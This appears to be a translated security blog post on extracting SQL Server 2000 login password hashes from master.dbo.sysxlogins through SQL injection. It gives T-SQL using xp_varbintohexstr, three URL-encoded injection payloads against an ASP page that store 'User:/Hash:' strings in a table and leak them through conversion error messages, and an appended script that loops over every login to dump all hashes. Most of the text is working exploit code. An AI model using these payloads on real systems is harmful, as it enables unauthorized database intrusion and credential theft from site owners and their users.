The password column in sysxlogins is varbinary, so its value cannot be pulled out directly through an error message. Recently I happened across an extended stored procedure named xp_varbintohexstr, which suggested a way around this:
Core demonstration code (run in Query Analyzer):
declare @p varbinary(64),@u varchar(16),@s varchar(128); select top 1 @u = name,@p = password from (select top 1 * from sysxlogins where password is NOT NULL order by name ASC)T order by name DESC; exec xp_varbintohexstr @p,@s OUT; select 'User:' + @u + '/Hash:' + @s;
The inner SELECT TOP 1 ... ORDER BY name ASC picks a single login row (the outer TOP 1 ... DESC then just returns that row); raising the inner TOP to N yields the Nth login by name, which is how the same statement is reused to walk through the rest of the table. xp_varbintohexstr renders the varbinary hash as a '0x...' hex string, which can then be concatenated and displayed like any other text. Only logins with password IS NOT NULL are considered, since Windows-authenticated logins store no hash.
Theory on its own is tiresome, so below are the results of a test against a local ASP site, connecting as SA, with database error messages displayed on the page:
Step.1
http://www.2cto.com/inject.asp?id=1;create+table+SQLhash(hash+varchar(2000))--
Step.2
http://www.2cto.com/inject.asp?id=1;declare+@p+varbinary(64),@u+varchar(16),@s+varchar(128);select+top+1+@u+=+name,@p+=+password+from+(select+top+1+*+from+master.dbo.sysxlogins+where+password+is+NOT+NULL+order+by+name+ASC)T+order+by+name+DESC;exec+master..xp_varbintohexstr+@p,@s+OUT;set+@s+=+'User:'+%2b+@u+%2b+'/Hash:'+%2b+@s;insert+into+SQLhash(hash)+values(@s)--
Step.3
http://www.2cto.com/inject.asp?id=1+and+(select+top+1+hash+from+SQLhash)=0--
Comparing the varchar value with the integer 0 forces an implicit conversion that fails, and the error message the page prints contains the User:/Hash: string stored in step 2.
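The three steps above, generalized to every login rather than a single row, as an added example that is not part of the original post. It assumes SQL Server 2000 (where master.dbo.sysxlogins exists and TOP cannot take a variable) and sysadmin rights, as in the SA test above; the table name SQLhash comes from the post, while the id column, the @last paging variable and the wider variable types are this example's own choices.

```sql
-- Added example (not from the original post): dump every SQL Server 2000 login hash
-- into a holding table, then read rows back one at a time through a conversion error.
-- Assumes SQL Server 2000 (master.dbo.sysxlogins) and sysadmin rights.

-- Step 1: holding table. The identity column lets each row be addressed by number
-- later, instead of relying on nested TOP 1 / ORDER BY tricks.
if object_id('SQLhash') is not null drop table SQLhash;
create table SQLhash (id int identity(1,1), hash varchar(2000));

-- Step 2: walk sysxlogins by name and store 'User:<name>/Hash:<hex>' per login.
-- Key-based paging (name > @last) is used because SQL Server 2000 does not accept
-- a variable in TOP. sysname/varbinary(256) match the real column types, so long
-- login names are not silently truncated as they would be with varchar(16).
declare @u sysname, @p varbinary(256), @s varchar(256), @last sysname;
set @last = '';
while 1 = 1
begin
    set @u = null;
    select top 1 @u = name, @p = password
    from master.dbo.sysxlogins
    where password is not null and name > @last   -- Windows logins have NULL here
    order by name asc;
    if @u is null break;                           -- no more logins with a stored hash

    -- xp_varbintohexstr renders the varbinary hash as an '0x...' string;
    -- a SQL Server 2000 hash is 46 bytes, i.e. 94 characters of output.
    exec master..xp_varbintohexstr @p, @s out;
    insert into SQLhash (hash) values ('User:' + @u + '/Hash:' + @s);
    set @last = @u;
end;

-- Step 3: read row N back through an error message. Comparing the varchar value
-- with the integer 0 forces an implicit conversion, which fails and echoes the
-- string in the error text on a page that displays SQL errors. Injected, the
-- condition is appended as:  and (select hash from SQLhash where id = 1) = 0--
select * from SQLhash;                                        -- direct view in Query Analyzer
select 1 where (select hash from SQLhash where id = 1) = 0;   -- conversion error carrying row 1

-- Clean up once the hashes have been copied out.
drop table SQLhash;
```

Run in Query Analyzer the first SELECT of step 3 simply lists the rows; in the injection scenario only the error-triggering comparison is usable, and changing id walks through the stored logins one per request.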